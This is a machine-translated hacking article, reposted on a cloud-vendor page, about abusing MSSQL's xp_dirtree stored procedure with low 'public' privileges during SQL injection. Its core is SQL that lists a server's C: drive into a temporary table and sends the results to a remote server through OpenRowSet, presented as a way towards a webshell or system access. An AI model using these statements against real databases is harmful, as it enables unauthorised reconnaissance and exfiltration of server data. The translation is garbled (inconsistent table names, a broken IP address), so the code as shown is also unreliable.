How to reuse xp_dirtree with public permission injection in MSSQL

Source: Internet
Author: User

Software Author: kj021320
Source: I .s. t. o Technical Team (http://blog.csdn.net/ I _S_T_O)

OriginallyArticleIt's been a long time in the team! It is only a small part of <art of SQL Injection>, but it is a pity that many pieces of data have been collected for a long time, but it is estimated that it will not be available at the end of the year ~ Then we will release it first! This is mainly because mssql2005 has all come! 2 K will be eliminated soon ~ Let's talk to you ~ The advertisement is finished...

Body:

Many people may feel depressed when talking about public permissions ~ N I read an article about getting webshell or system permissions under the public and db_owner permissions in MSSQL (the name is really long -_-!!!), It says there is no way to use xp_regread, xp_dirtree... The reason for these stored procedures is that there is no way to create a table in public. Here I will correct the fact that public can be used to create a table ~ So that these stored procedures can be used efficiently.CodeRight

-- Create a temporary table. Generally, we cannot create a temporary table. We can only create a temporary table.

Create Table # nonamed (

Dir ntext,

Num int

)

-- Call the stored procedure to save the executed data to the temporary table

Insert ## nonamed execute Master .. xp_dirtree 'C: \ ', 1

-- Use the OpenRowSet function to export the data in the temporary table to the dirtree table in the local MSSQL.

Insert into OpenRowSet ('sqloledb', '192. 0.0.1 '; 'user'; 'pass', 'select * From northwind. DBO. dirtree ')

Select * from # nonamed

The above method, that is to say, public can traverse the directories on the user server. What are the specific usage values ~ Haha

Trackback: http://tb.blog.csdn.net/TrackBack.aspx? Postid = 1736964

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.